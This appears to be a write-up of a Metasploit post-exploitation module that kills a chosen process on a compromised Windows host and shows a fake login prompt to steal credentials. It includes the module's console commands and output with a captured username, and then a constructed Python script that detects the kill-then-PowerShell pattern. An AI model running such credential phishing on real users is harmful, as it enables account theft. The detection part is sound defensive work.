Description:
This module is able to perform a phishing attack on the target by
popping up a loginprompt. When the user fills credentials in the
loginprompt, the credentials will be sent to the attacker. The
module is able to monitor for new processes and popup a loginprompt
when a specific process is starting. Tested on Windows 7.
When notepad.exe is opened on the target machine, a login prompt window appears. If the right password is provided, the Notepad window appears; otherwise the prompt keeps coming back until you hate it.
msf post(phish_windows_credentials) > show options
Module options (post/windows/gather/phish_windows_credentials):
Name         Current Setting                                                                Required  Description
----         ---------------                                                                --------  -----------
DESCRIPTION  {PROCESS_NAME} needs your permissions to start. Please enter user credentials  yes       Message shown in the loginprompt
PROCESS                                                                                     no        Prompt if a specific process is started by the target. (e.g. calc.exe or specify * for all processes)
SESSION                                                                                     yes       The session to run this module on.
msf post(phish_windows_credentials) > set SESSION
SESSION =>
msf post(phish_windows_credentials) > set PROCESS notepad.exe
PROCESS => notepad.exe
msf post(phish_windows_credentials) > run
[+] PowerShell is installed.
[*] Monitoring new processes.
[*] notepad.exe is already running. Waiting on new instances to start
[*] notepad.exe is already running. Waiting on new instances to start
[*] notepad.exe is already running. Waiting on new instances to start
[*] New process detected: notepad.exe
[*] Killing the process and starting the popup script. Waiting on the user to fill in his credentials...
[+] #< CLIXML
[+]
[+] UserName Domain Password
-------- ------ --------
nfs nfs-
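
For defenders, the sequence in the output above (a newly started process is killed, then the popup script starts) leaves a recognizable trace in process telemetry. The following is an added example, not code from the module or the original post: it flags a process that is terminated within seconds of starting and is followed by a powershell.exe start on the same host. The event tuples, host names and both time thresholds are constructed assumptions, as is the premise that the popup script shows up as a new powershell.exe process.

```python
from datetime import datetime, timedelta

# Constructed, simplified process events (not real telemetry). "create" and
# "terminate" correspond to Sysmon Event ID 1 and Event ID 5 respectively.
SAMPLE_EVENTS = [
    ("2015-02-10 09:00:01", "create",    "WS01", 4012, "notepad.exe"),
    ("2015-02-10 09:00:02", "terminate", "WS01", 4012, "notepad.exe"),
    ("2015-02-10 09:00:03", "create",    "WS01", 4100, "powershell.exe"),
    ("2015-02-10 09:05:00", "create",    "WS01", 4200, "calc.exe"),
    ("2015-02-10 09:09:30", "terminate", "WS01", 4200, "calc.exe"),
    ("2015-02-10 09:09:31", "create",    "WS01", 4300, "powershell.exe"),
    ("2015-02-10 10:00:00", "create",    "WS02", 5000, "notepad.exe"),
    ("2015-02-10 10:00:01", "terminate", "WS02", 5000, "notepad.exe"),
]

MAX_LIFETIME = timedelta(seconds=5)   # assumed: process is killed almost at once
MAX_GAP = timedelta(seconds=10)       # assumed: prompt script starts right after


def find_kill_then_prompt(events, max_lifetime=MAX_LIFETIME, max_gap=MAX_GAP):
    """Return (host, image, killed_at) for each short-lived process whose
    termination is followed by a powershell.exe start on the same host."""
    parsed = sorted(
        (datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), kind, host, pid, image.lower())
        for ts, kind, host, pid, image in events
    )
    started = {}   # (host, pid) -> creation time
    killed = []    # (host, image, termination time) of short-lived processes
    alerts = []
    for when, kind, host, pid, image in parsed:
        if kind == "create":
            if image == "powershell.exe":
                for k_host, k_image, k_when in killed:
                    if k_host == host and timedelta(0) <= when - k_when <= max_gap:
                        alerts.append((host, k_image, k_when))
            started[(host, pid)] = when
        elif kind == "terminate":
            born = started.pop((host, pid), None)
            if born is not None and when - born <= max_lifetime:
                killed.append((host, image, when))
    return alerts


if __name__ == "__main__":
    for host, image, when in find_kill_then_prompt(SAMPLE_EVENTS):
        print(f"{host}: {image} killed at {when}, then powershell.exe started")
```

On the sample data only the WS01 notepad.exe sequence is flagged: calc.exe ran for several minutes before exiting, and the WS02 kill is not followed by a PowerShell start.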
[1] https://forsec.nl/2015/02/windows-credentials-phishing-using-metasploit/
[2] https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/phish_windows_credentials.rb
[3] https://github.com/rapid7/metasploit-framework/blob/master/data/post/powershell/Invoke-LoginPrompt.ps1